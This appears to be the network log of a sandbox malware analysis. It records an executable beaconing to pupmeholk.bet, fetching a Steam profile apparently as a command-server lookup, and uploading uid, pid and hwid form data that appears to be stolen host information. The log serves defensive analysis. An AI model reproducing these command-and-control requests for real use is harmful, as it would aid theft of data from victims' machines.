                                                                                                                                                                                                                                                  2025-03-17 00:04:14 UTC1576INData Raw: 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 4c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65
                                                                                                                                                                                                                                                  Data Ascii: ... responsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><div class="footer_content"><span id="footerLogo"><img src="https://community.cloudflare.ste


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.449724104.21.32.14437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC264OUTPOST /pLoska HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 51
                                                                                                                                                                                                                                                  Host: pupmeholk.bet
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC51OUTData Raw: 75 69 64 3d 30 36 31 30 32 61 36 33 36 61 38 63 34 61 34 33 33 32 63 38 34 33 63 38 62 62 34 63 39 30 65 30 66 31 33 61 39 61 62 30 37 64 26 63 69 64 3d
                                                                                                                                                                                                                                                  Data Ascii: uid=06102a636a8c4a4332c843c8bb4c90e0f13a9ab07d&cid=
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC779INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:15 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 14134
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xoc%2Bu%2BzfhgQA2loNy565NbDb9GRt1pi9eNLMyXM7jmKZU%2FHNrnPKt%2BCq9u2IJhZ5v7%2BHbKwYgc2BNJXT3AlJqXDWYEgBtoOV2QQE4Myo1YGrfMDqJjwUYoviioZtWq3l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 92183b5d8d608c73-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2786&min_rtt=2142&rtt_var=2092&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=951&delivery_rate=400109&cwnd=91&unsent_bytes=0&cid=58e5575dc3835de4&ts=418&x=0"
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC590INData Raw: c8 ff 69 43 cf ac 42 63 17 aa 93 55 c1 c5 02 d0 6d 3a 3b f1 9c fd 8f 3e a9 cd b0 5d 14 45 b3 6d 99 fc b1 4f 0f cc fc 41 03 6e cb 24 eb 73 79 5c df 82 ac 0b 57 05 56 ea 2d ad b7 1a 58 05 0a e9 b3 2b b7 e8 56 95 c6 2c 3a cd b0 78 f6 79 d2 07 bb ac 23 8e e2 ce 73 57 14 f2 c6 bf 60 27 5c 42 1f 19 f9 87 b9 a6 32 21 62 63 8d 81 49 12 5d 37 45 6c ea 76 96 15 78 34 de 16 94 5c a6 d8 bd 5b b4 49 b0 12 5c 69 1e 28 04 38 ad 67 8f 59 03 cd 4e 31 e4 0d 45 dd f2 7e 65 90 c8 61 2b 13 bf 9a f7 07 f9 28 2a c5 24 15 c0 e8 4b a5 4f 9f 33 d0 54 2e 65 3f c0 b4 17 75 a2 12 b2 55 06 54 6b e5 13 7d f3 3a c5 1b f3 37 25 48 57 e4 4e 25 e3 a4 78 b4 86 86 05 d5 ce 36 75 57 f9 26 0a f4 f3 81 cc 34 4a 9f bf 19 af 3f af a0 53 b9 ec ab af bb b8 cc 0f f0 64 1d 9c 55 14 94 2f 96 ff af 3f
                                                                                                                                                                                                                                                  Data Ascii: iCBcUm:;>]EmOAn$sy\WV-X+V,:xy#sW`'\B2!bcI]7Elvx4\[I\i(8gYN1E~ea+(*$KO3T.e?uUTk}:7%HWN%x6uW&4J?SdU/?
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC1369INData Raw: 2d 91 f2 24 e3 6a b0 5f 57 47 ae ef b9 d4 4a 81 32 f2 d4 f0 aa 4f 65 7e 1a 6a b2 19 10 6d 73 f2 0b 8e a4 8f 06 da 9d c9 dd 05 1e ee a1 af 6f 04 0c 8c e2 f9 4c d9 09 3b 73 87 e0 bd 29 38 57 f5 b5 35 a4 e9 00 91 f2 b1 e0 94 9f 62 2d ff 0f 43 24 48 14 6e 67 c9 e7 d0 a7 d4 ad be 97 a0 04 4e 91 59 d7 72 a2 24 0e 09 0c 67 35 f0 3d c4 92 88 0b 44 1e d8 ce 4e c0 54 c0 2c c7 b5 a9 50 9b 3a 4d de 94 bb d7 71 45 d8 a0 a1 8e 1c 92 3f 67 1a b8 b8 e6 f1 79 6a b0 8b 74 5e 92 78 a5 1a 45 f8 69 b0 a3 1c 37 97 a4 bb cb 96 9a cd c9 9e 2b dc f4 ca 7b f1 e6 e8 fc 83 f8 45 78 d2 6b 18 92 f1 61 cb bf 84 8f ed 82 2f c1 ce 71 60 4b fb 9f b9 16 8a 50 4e f9 31 33 94 8f 60 31 27 f6 fa ac 8f 7b b0 87 62 5b ef d3 6d ab ad e6 33 ec c8 15 e8 09 4b 10 21 b6 fe bf 58 58 47 07 71 e6 d8 be
                                                                                                                                                                                                                                                  Data Ascii: -$j_WGJ2Oe~jmsoL;s)8W5b-C$HngNYr$g5=DNT,P:MqE?gyjt^xEi7+{Exka/q`KPN13`1'{b[m3K!XXGq
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC1369INData Raw: 31 4f c2 f2 7a b6 2e b2 78 00 e6 75 86 95 a1 73 83 38 5a 15 55 81 02 68 7f 05 53 78 6b 34 ad e2 8d 0d d4 26 bd 05 5b d3 95 97 b0 28 2d c8 7d 8d 26 84 dd c2 b4 4a b1 a6 11 af ef 1a 9b a0 29 df d6 3f 2c 2d 2d 9e c3 06 ea 07 06 3f d0 05 70 c2 be 5a d0 94 72 03 0b 3b 25 c0 0a 1c eb 08 eb 3b 3a 67 94 50 98 ab eb 62 6b 0d 20 e3 81 08 09 83 35 63 15 c2 b2 96 06 a8 9e 90 9d df 3d b9 e6 be f6 41 41 07 2b 77 6b c2 0f 0c fa 9f a4 b9 fb 35 46 77 84 27 c9 28 16 a6 8b 35 c0 5c 6e 9c 5f df ce fc 68 7e 98 7a 47 ab 05 1f 9c 09 dc 63 67 37 48 55 70 d5 de 7d df 21 48 fa a5 25 b1 24 65 aa 4c 81 26 c1 53 24 ec b5 4f 27 f7 33 7b ad 4d e2 61 2c c7 b0 e0 e4 c2 8c 28 b7 cc ca 3b e2 06 e2 83 d8 08 c4 14 b2 15 b9 b3 36 2c 0e bc 0c 86 b8 28 93 3b 83 13 42 49 18 a8 ff b3 10 fb d4 6d
                                                                                                                                                                                                                                                  Data Ascii: 1Oz.xus8ZUhSxk4&[(-}&J)?,--?pZr;%;:gPbk 5c=AA+wk5Fw'(5\n_h~zGcg7HUp}!H%$eL&S$O'3{Ma,(;6,(;BIm
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC1369INData Raw: 0d 86 b8 88 39 e8 08 b5 d5 e3 61 97 96 b9 c1 3d ff d1 29 d4 1b f2 6e 6f c5 1b 4c e5 49 75 a7 de a5 3c e0 6a d6 86 7d da ed b3 b2 c1 bb 56 38 b0 b1 08 87 f1 3a 74 cb 09 7e 40 3a 45 bf bb 09 fd 33 79 c3 57 4f 71 91 00 2f b7 04 58 de 8e 01 78 1b 95 f2 6b 7f f3 92 c6 a7 3e e2 15 f9 47 8c 41 d8 b4 53 29 17 29 66 95 bb ef 6e 3e f8 88 d3 54 42 d8 df e7 b1 4b 5c 8b aa 29 bd ac 07 14 d1 69 3c 51 6e 02 2d 14 0f 3a 69 e2 26 8e a9 02 fb d8 f4 35 1d 17 02 12 48 6c 7d aa 21 79 47 49 9f 63 4a ea ae 4e c7 be 2d 15 57 1d ea 1f 9c 39 50 be ff 84 46 29 cb a3 de db 5a 11 93 ff a7 cc 06 d4 ca 39 83 58 d2 cd 91 0f 00 0f 83 cf ef c7 7b 1f bd aa 6f c9 08 4e e8 e2 b8 5d 91 97 51 36 5f 69 8c 78 ac 8e ce 8c 7e ba 7f 58 85 0a 6e 6c 62 a2 26 be 2a 6d b2 90 20 51 37 f4 e9 3c 9f fe d3
                                                                                                                                                                                                                                                  Data Ascii: 9a=)noLIu<j}V8:t~@:E3yWOq/Xxk>GAS))fn>TBK\)i<Qn-:i&5Hl}!yGIcJN-W9PF)Z9X{oN]Q6_ix~Xnlb&*m Q7<
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC1369INData Raw: e3 fe e1 cf 3a 7f 12 15 89 b5 2f d7 08 84 98 87 a6 b1 d2 9d 06 97 02 ae aa 74 cb d6 b5 6c e0 19 9c 33 f6 57 db 04 07 a3 0d d9 b5 87 37 ab 6e 4b eb 13 a1 26 84 e5 1f 1d 34 7d 16 be d8 4b 89 1d 25 5b ca 05 2e 7e ef 10 53 1c ca 49 9a 18 01 b8 af 0e 9d dd 25 61 81 df 2f 3c 52 5c 95 0d 93 84 5c 84 47 33 14 36 76 26 4f 3b 02 ed 0a a6 74 b1 ac e2 ab 6d 34 3a e7 7f ad bb 46 f0 22 f5 ca cc 2b 86 f4 4b 1a 9c 40 21 88 09 7c 45 b1 80 bf 69 56 15 6a 70 31 15 d4 e3 93 20 4d 65 c6 6a b8 40 b7 d1 56 e6 26 59 13 5f df b8 bf 7f 94 b7 73 17 5c 5d 72 0e c9 fb 4e eb 9d 51 c6 51 c7 11 98 6b 8f ae 31 65 3a d3 6e 22 8e 30 17 88 be bd 1b 8f 2a ec c0 47 e9 3c bc c8 5c 25 c7 bb 59 03 ab 0d 26 05 70 f1 61 2d 88 82 81 bd ac 66 dc f0 99 c1 9f 7c 82 15 63 15 97 8c 9f 83 76 e1 bb 8e 4e
                                                                                                                                                                                                                                                  Data Ascii: :/tl3W7nK&4}K%[.~SI%a/<R\\G36v&O;tm4:F"+K@!|EiVjp1 Mej@V&Y_s\]rNQQk1e:n"0*G<\%Y&pa-f|cvN
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC1369INData Raw: 7a 79 62 70 21 45 b8 77 d1 c7 96 23 e7 13 2d 9b 2e 4b 16 de 9e 99 e7 04 74 d1 bc 0e 81 70 27 73 36 c6 e2 bd ff 07 68 5b d7 ca 5f 6c 09 b2 e4 6a 9a 09 c9 41 e3 64 88 0d ab 49 0b 0b 97 3a 22 0c 43 d3 ed 66 d5 86 c5 fe ad 89 00 d8 2d 66 66 d7 db bb 0a e9 a2 e2 24 98 e1 75 b3 09 b7 e9 c3 bd 66 40 fe 79 d3 60 53 89 c8 c5 55 3f 8b 7c 46 81 c6 71 2b c0 dd 41 88 63 12 20 24 b5 2c 7c 54 df a5 37 ba 9b 83 53 71 fa ce 1b 38 8f 7b 34 86 d4 55 d7 f3 40 61 30 7e 51 36 e8 f4 c2 26 22 05 db ef 66 80 dc b2 59 08 80 22 cc 70 2b 75 f3 7e 9a 5f 00 4e 33 43 50 e7 b0 df 49 21 71 28 9f f6 e6 0c 00 8f b7 ea 0e 11 be f5 67 4c a5 94 1a 21 15 30 94 46 eb 40 68 4d e0 15 30 d5 81 40 ea e0 31 60 50 1f 02 74 fd 5a 70 38 ff c0 53 a6 5d 58 d8 82 5d 55 00 5c db e8 fd 96 0c 67 9d 50 63 8b
                                                                                                                                                                                                                                                  Data Ascii: zybp!Ew#-.Ktp's6h[_ljAdI:"Cf-ff$uf@y`SU?|Fq+Ac $,|T7Sq8{4U@a0~Q6&"fY"p+u~_N3CPI!q(gL!0F@hM0@1`PtZp8S]X]U\gPc
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC1369INData Raw: 92 ef ac 1e 86 e2 3e 3b f4 72 66 91 de d2 0a 28 67 2a fe 2a 6d ea 69 d1 e1 aa 27 07 95 ff 65 15 9d 68 b2 bb 01 61 b3 29 53 42 95 2c c0 d6 80 a1 b9 6a 5d 68 a1 cc 5b 17 67 f5 49 52 46 46 28 ca ed 5b 44 6d 02 0e 68 2a e8 90 8c fc 3c e0 88 2f c4 4b d1 1c 66 a8 31 14 de 45 ed 8c 53 8b 45 54 fb 74 9f c5 0c 16 37 9c f4 14 70 1c ab aa de d7 e5 87 73 4b 93 b3 80 e2 45 07 d5 43 2f f5 3c 5c d3 08 c9 d3 a6 1c 05 f2 20 d8 27 ed c3 fc 31 c7 98 a3 a8 75 93 47 20 ff 46 db 33 36 7b 95 71 cd d5 e3 23 17 a1 17 67 2f 50 1f 6a a1 94 ff ba cb 97 fe de d5 b1 76 14 f6 61 2b b2 ed 33 e3 60 86 59 e9 ff 20 ec 53 f9 e9 9a 7c 07 86 40 77 57 97 33 71 9e 1e 74 85 2b e4 c7 fe 87 05 48 7d 3e 5d 7b 5d 7a cc 63 e8 9c e3 ca f5 04 f3 1e 59 90 61 bc 70 13 4d 57 54 ad 35 00 58 30 99 30 9b e2
                                                                                                                                                                                                                                                  Data Ascii: >;rf(g**mi'eha)SB,j]h[gIRFF([Dmh*</Kf1ESETt7psKEC/<\ '1uG F36{q#g/Pjva+3`Y S|@wW3qt+H}>]{]zcYapMWT5X00
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC1369INData Raw: f9 ae cd 86 9e 79 c2 67 a3 3d fe c3 7b 8f bc 2b 2a be 51 e1 51 6e 56 fe 58 0d 29 98 c2 b7 d6 c9 b3 d9 88 82 91 e0 92 1d f1 40 e4 5c bf f6 75 97 85 4a 06 89 eb af dd d5 0a 59 c2 23 b8 84 2d 31 ed 0c 1c 7d 0d 07 bc 04 97 8e cb 83 1e af 98 e0 87 40 a4 32 90 45 61 88 21 81 62 6c 4c e4 17 59 91 50 5a 7a 6a 75 46 95 ba e1 c8 b7 8b 40 27 2a 11 fc cb 47 03 69 50 b8 6b 3d 88 1e 59 6c 0d 11 fb 43 d1 39 8a fa 70 ea ee f4 cd 32 11 71 b4 0d b1 75 82 c6 2e f8 33 27 e7 93 06 f0 4a 20 71 cb 5b 80 a3 fe 11 44 bc 2e 5f 78 bc 01 93 83 ff 87 ff 06 a8 8f 98 29 2c db 6f ef f0 88 f0 57 48 ff fa ed 93 16 dd 6a a6 40 ca f5 d8 93 9c 32 9f a9 8a c1 c5 71 11 2c 27 cb 07 01 d1 dd 60 c9 53 db 0b b6 2e 07 b8 05 c3 e3 d3 64 45 56 79 b9 1d 7f 6e 3d cf 34 9d a4 5f b3 b8 40 ab 59 26 3b a4
                                                                                                                                                                                                                                                  Data Ascii: yg={+*QQnVX)@\uJY#-1}@2Ea!blLYPZzjuF@'*GiPk=YlC9p2qu.3'J q[D._x),oWHj@2q,'`S.dEVyn=4_@Y&;
                                                                                                                                                                                                                                                  2025-03-17 00:04:15 UTC1369INData Raw: 3f 0f da d6 82 e3 19 2f a8 bc 17 9d 22 f2 a4 a3 2d 4d 30 b5 80 72 5e 80 22 4e 56 86 82 5c f0 88 1e 52 b0 7d 4f ee 43 00 c2 23 76 86 e3 84 0c e2 6e 5a 02 dc 25 e8 ea 3e 20 74 22 97 05 5c da 74 7e 48 9d b0 bc 12 54 9a 6e b8 3c f3 67 da 32 e2 19 cf 1f 31 25 02 78 6f cc f4 7b 14 10 bb cd 80 5e e0 91 51 e6 04 63 68 77 7f 72 e5 00 6f f9 3e 21 4e 4a 24 61 69 5b f4 84 ae a1 75 76 d4 e6 53 ae 1c ea ce ad b8 73 2b 64 48 ad 65 fb c2 9a 40 a2 bd cb ee 6b 98 14 92 61 88 88 d9 51 33 e2 a1 a2 f9 4f 93 e8 c4 e4 d3 a9 3d 8d 5a 8f c6 ff bd de e7 f4 6e c9 36 0a e3 77 13 ed 57 fa 46 a4 49 58 96 19 a3 d9 6f b8 52 f7 8e 4e 8f 68 21 cd a4 7d 12 45 8a 19 bc 2f 17 5b 77 31 83 3d 29 f4 df 48 0b fe 63 53 79 19 95 a9 cc 4e bf 26 ad 1e 26 39 9c 50 5c 6f b6 34 ce 05 e1 63 47 4c 4a 55
                                                                                                                                                                                                                                                  Data Ascii: ?/"-M0r^"NV\R}OC#vnZ%> t"\t~HTn<g21%xo{^Qchwro>!NJ$ai[uvSs+dHe@kaQ3O=Zn6wWFIXoRNh!}E/[w1=)HcSyN&&9P\o4cGLJU


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.449725104.73.234.1024437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:17 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:17 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:17 GMT
                                                                                                                                                                                                                                                  Content-Length: 36132
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=d575ff83348194aad1c461a7; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-03-17 00:04:17 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:17 UTC16384INData Raw: 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 74 61 74 73 2f 22 3e 0a 09 09 09 09 09 09 53 74 61 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 20 73 75 70 65 72 6e 61 76 5f 61 63 74 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 74 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22
                                                                                                                                                                                                                                                  Data Ascii: </a><a class="submenuitem" href="https://store.steampowered.com/stats/">Stats</a></div><a class="menuitem supernav supernav_active" href="https://steamcommunity.com/" data-tooltip-type="selector"
                                                                                                                                                                                                                                                  2025-03-17 00:04:17 UTC3762INData Raw: 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 41 6c 69 61 73 65 73 22 3e 0a 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 43 6c 65 61 72 41 6c 69 61 73 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 62 6f 74 68 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 72 65 61 6c 5f 6e 61 6d 65 20 65
                                                                                                                                                                                                                                                  Data Ascii: <div id="NamePopupAliases"></div><div style="display:none" id="NamePopupClearAliases"></div><div style="clear:both"></div></div></div></div><div class="header_real_name e
                                                                                                                                                                                                                                                  2025-03-17 00:04:17 UTC1576INData Raw: 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 4c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65
                                                                                                                                                                                                                                                  Data Ascii: ... responsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><div class="footer_content"><span id="footerLogo"><img src="https://community.cloudflare.ste


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.449726104.21.32.14437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:18 UTC273OUTPOST /pLoska HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=LROCnNpQD
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 19576
                                                                                                                                                                                                                                                  Host: pupmeholk.bet
                                                                                                                                                                                                                                                  2025-03-17 00:04:18 UTC15331OUTData Raw: 2d 2d 4c 52 4f 43 6e 4e 70 51 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 36 31 30 32 61 36 33 36 61 38 63 34 61 34 33 33 32 63 38 34 33 63 38 62 62 34 63 39 30 65 30 66 31 33 61 39 61 62 30 37 64 0d 0a 2d 2d 4c 52 4f 43 6e 4e 70 51 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 52 4f 43 6e 4e 70 51 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 46 34 32 44 33 34 36 34 36 33 30 44 34 38 43 39 41 31 43 34 32 45 37 42 33 46 32
                                                                                                                                                                                                                                                  Data Ascii: --LROCnNpQDContent-Disposition: form-data; name="uid"06102a636a8c4a4332c843c8bb4c90e0f13a9ab07d--LROCnNpQDContent-Disposition: form-data; name="pid"2--LROCnNpQDContent-Disposition: form-data; name="hwid"549F42D3464630D48C9A1C42E7B3F2
